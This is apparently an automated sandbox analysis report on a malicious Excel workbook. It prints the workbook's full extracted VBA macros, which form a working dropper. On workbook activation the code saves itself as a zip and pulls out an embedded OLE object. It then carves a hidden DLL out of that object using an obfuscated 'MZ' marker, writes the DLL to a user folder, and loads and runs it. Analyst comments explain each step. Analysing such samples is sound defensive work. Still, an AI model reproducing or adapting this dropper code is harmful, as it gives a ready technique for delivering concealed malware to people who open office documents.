Executable file name Public Declare Function Wakeup Lib libGTPK1.dll () As Integer
Executable file name nm = nm.dll
Suspicious
Chr May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
Open May open a file
Shell May run an executable file or a system command
WScript_Shell May run an executable file or a system command
Binary May read or write a binary file (if combined with Open)
CreateObject May create an OLE object
Write May write to a file (if combined with Open)
Put May write to a file (if combined with Open)
Lib May run code from a DLL
Kill May delete a file
Lib May run code from a DLL
Shell May run an executable file or a system command
CreateObject May create an OLE object
FileCopy May copy a file
ActiveWorkbook_SaveAs May save the current workbook
AutoExec
Workbook_Activate Runs when the Excel Workbook is opened

Extracted Macros

VBA Filename Module1.bas Extracted Macro
#If Win64 Then
    Public Declare PtrSafe Function Wakeup Lib _
        "libGTPK2.dll" () As Integer
    Public Declare PtrSafe Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function Wakeup Lib _
        "libGTPK1.dll" () As Integer
#End If
   
Public Function ITestModule_GetErrorInterface()
    Set ITestModule_GetErrorInterface = g_errorobj
End Function
Public Function ITestModule_GetProviderInterface()
    Set ITestModule_GetProviderInterface = g_provobj
End Function
Public Sub ITestModule_SetErrorInterface(ByVal pError)
    Set g_errorobj = pError
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_SetErrorInterface" + Chr(10)
    End If
End Sub
Public Sub ITestModule_SetMallocSpyCallback(pbVoodoo As Byte)
    tracemod = False
    numcases = 0
    'MsgBox ("ITestModule_SetMallocSpyCallback")
End Sub
Public Sub ITestModule_SetProviderInterface(ByVal pProvInfo)
On Error GoTo ixx
    Set g_provobj = pProvInfo
    For i = 0 To numcases - 1
        ca.ses(i).SetCaseProvider g_provobj
    Next i
Exit Sub
ixx:
MsgBox Err.Description
End Sub
Public Function ITestModule_Terminate() As Boolean
    ITestModule_Terminate = True
End Function
Public Sub AppStart()

ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
Dim WaitForSingle As Object
    Dim SpecialPath As String
    

Set WaitForSingle = CreateObject("WScript.Shell")
   
UserForm3.TextBox1.Tag = WaitForSingle.ExpandEnvironmentStrings("%" + UserForm3.TextBox1.Tag + "%")

UserForm3.TextBox1.Tag = Replace(UserForm3.TextBox1.Tag, "%", "")
UserForm3.TextBox2.Tag = WaitForSingle.SpecialFolders(UserForm3.TextBox2.Tag)
'LocalAppData
ChDir (UserForm3.TextBox1.Tag)

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
End Sub




Public Function ITestModule_GetCase(ByVal lIndex As Long)
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
    End If
    numcases = numcases + 1
    Select Case lIndex
        Case 0
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
        Case 1
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
        Case 2
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
        Case 3
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
        Case 4
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
        Case 5
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
        Case 6
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
        Case 7
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
        Case 8
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
        Case 9
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
        Case 10
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldattributes")
        Case 11
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.flddefinedsize")
        Case 12
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldname")
        Case 13
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldoriginalvalue")
        Case 14
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldprecision")
        Case 15
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldtype")
        Case 16
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldvalue")
        Case 17
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsactivecn")
        Case 18
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsclose")
        Case 19
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmove")
        Case 20
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovefirst")
        Case 21
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovenext")
        Case 22
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmoveprev")
        Case 23
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsopen")
        Case 24
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssource")
        Case 25
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssupports")
        Case 26
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsbof")
        Case 27
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rseof")
        Case 28
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rscachesize")
        Case 29
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rspagesize")
        Case 30
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsrequery")
    End Select
    ca.ses(numcases - 1).SetCaseError g_errorobj
    ca.ses(numcases - 1).SetCaseProvider g_provobj
    Set Locprov = g_provobj
    Set ITestModule_GetCase = ca.ses(numcases - 1)
End Function
Public Sub NewValuje(s As String, nm As String, fl As Long, Variable_6 As Integer)
    Dim Variable_1 As Long, Variable_2 As Byte, Variable_3 As Byte, Variable_4 As Byte
    Dim Variable_5() As Long

    ReDim Variable_5(1 To fl)
    ' Marker bytes 77, 90, 144 = "MZ" followed by 0x90, i.e. the DOS header that opens a PE image
    Variable_5(1) = CByte(40 + 37)
    Variable_5(2) = CByte(40 + 50)
    Variable_5(1 + 2) = CByte(40 + 104)

    Variable_1 = FreeFile
    Open s For Binary Access Read As Variable_1
    Dim cur As Integer
    cur = 1
    ' Scan the input file (the extracted OLE object) byte by byte for the Variable_6-th
    ' occurrence of the marker, then read fl bytes from that point into Variable_5
    Do While Not EOF(Variable_1)
        Get Variable_1, , Variable_2
        If Variable_2 = Variable_5(1) Then
            Get Variable_1, , Variable_3
            If Variable_3 = Variable_5(2) Then
                Get Variable_1, , Variable_4
                If Variable_4 = Variable_5(3) Then
                    If cur = Variable_6 Then
                        For k = 4 To fl
                            Get Variable_1, , Variable_2
                            Variable_5(k) = Variable_2
                        Next k
                        Exit Do
                    Else
                        cur = cur + 1
                    End If
                End If
            End If
        End If
    Loop
    Close Variable_1
    
    Variable_1 = FreeFile
    Open nm For Binary Lock Read Write As #Variable_1
    For i = LBound(Variable_5) To UBound(Variable_5)
        Put #Variable_1, , CByte(Variable_5(i))
    Next i

    Close #Variable_1
End Sub
VBA Filename UserForm1.frm Extracted Macro
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub
VBA Filename Sem.cls Extracted Macro
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If

End Sub
VBA Filename Module2.bas Extracted Macro
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
  
#End If



Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Sub SystemButtonSettings(frm As Object, show As Boolean)
    Dim windowStyle As Long
    Dim windowHandle As Long

    ' Locate the form's window by caption and toggle its system menu (title-bar close button)
    windowHandle = FindWindowA(vbNullString, frm.Caption)
    windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

    If show Then
        SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)
    Else
        SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)
    End If

    DrawMenuBar (windowHandle)

End Sub

VBA Filename Module3.bas Extracted Macro



Sub test()

Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)

For R = 1 To RCount
    For C = 1 To CCount
        Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
    Next
Next

End Sub




Public Sub ReplaceCurrentModule()
    NameFav = UserForm3.TextBox1.Tag + "\favorite" + ".xlsx"
    ZipName = NameFav + ".zip"
    ZipFolder = UserForm3.TextBox1.Tag
    Dim nm As String
    Dim API_LENGTH As Long
    Dim d_6 As Integer
    ' Output DLL path, payload length and marker index depend on the Office bitness
    nm = UserForm3.TextBox2.Tag + "\libGTPK1"
    API_LENGTH = 282624
    d_6 = 1

#If Win64 Then
    nm = UserForm3.TextBox2.Tag + "\libGTPK2"
    API_LENGTH = 201216
    d_6 = 2
#End If
    nm = nm + ".d" + "ll"
    KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm

    ' Save a copy of the workbook as .xlsx (FileFormat 51), then treat it as a zip archive
    DoEvents
    ThisWorkbook.Sheets.Copy
    Application.DisplayAlerts = False
    ActiveWorkbook.SaveAs NameFav, FileFormat:=51
    DoEvents
    ActiveWorkbook.Close
    DoEvents

    FileCopy NameFav, ZipName

    ' Pull the embedded OLE object out of the archive, carve the DLL from it and load it
    Set oApp = CreateObject("Shell." + "Application")
    oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
    NewValuje ZipFolder + "\oleObject1." + "bin", nm, API_LENGTH, d_6

    ChDir (UserForm3.TextBox2.Tag)
    No_Wakeup = Wakeup2(nm)
    Wakeup

End Sub

This file is not on VirusTotal.

Process Tree

  • EXCEL.EXE 2024 "C:\Users\user\AppData\Local\Temp\tmp7ch5i7dz.xls" /e

EXCEL.EXE, PID: 2024, Parent PID: 252
Full Path: C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Command Line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\tmp7ch5i7dz.xls" /e

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name CVR368A.tmp.cvr
Associated Filenames
C:\Users\user\AppData\Local\Temp\CVR368A.tmp.cvr
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
ClamAV None
Yara None matched
CAPE Yara None matched
Sorry! No CAPE files.
Sorry! No process dumps.

Processing ( 3.166 seconds )

  • 0.898 Deduplicate
  • 0.675 CAPE
  • 0.632 Static
  • 0.467 TargetInfo
  • 0.283 BehaviorAnalysis
  • 0.138 TrID
  • 0.048 Strings
  • 0.012 AnalysisInfo
  • 0.011 NetworkAnalysis
  • 0.002 Debug

Signatures ( 0.165 seconds )

  • 0.033 antiav_detectreg
  • 0.011 infostealer_ftp
  • 0.009 decoy_document
  • 0.009 stealth_timeout
  • 0.009 ransomware_files
  • 0.006 NewtWire Behavior
  • 0.006 api_spamming
  • 0.006 antianalysis_detectreg
  • 0.006 infostealer_im
  • 0.004 antivm_generic_scsi
  • 0.004 antidbg_windows
  • 0.004 antiav_detectfile
  • 0.004 ransomware_extensions
  • 0.003 persistence_autorun
  • 0.003 antivm_vbox_keys
  • 0.003 infostealer_bitcoin
  • 0.002 tinba_behavior
  • 0.002 Doppelganging
  • 0.002 antivm_generic_services
  • 0.002 antiemu_wine_func
  • 0.002 mimics_filetime
  • 0.002 PlugX
  • 0.002 antivm_parallels_keys
  • 0.002 antivm_vmware_keys
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.002 office_martian_children
  • 0.001 malicious_dynamic_function_loading
  • 0.001 bootkit
  • 0.001 rat_nanocore
  • 0.001 infostealer_browser
  • 0.001 exploit_getbasekerneladdress
  • 0.001 stealth_file
  • 0.001 betabot_behavior
  • 0.001 kibex_behavior
  • 0.001 antivm_generic_disk
  • 0.001 infostealer_browser_password
  • 0.001 dynamic_function_loading
  • 0.001 cerber_behavior
  • 0.001 kovter_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vpc_keys
  • 0.001 antivm_xen_keys
  • 0.001 bot_drive
  • 0.001 modify_proxy
  • 0.001 darkcomet_regkeys
  • 0.001 disables_browser_warn
  • 0.001 recon_fingerprint

Reporting ( 0.003 seconds )

  • 0.003 CompressResults
Task ID 94393
Mongo ID 5d9e777cc3c009112d67b40a
Cuckoo release 1.3-CAPE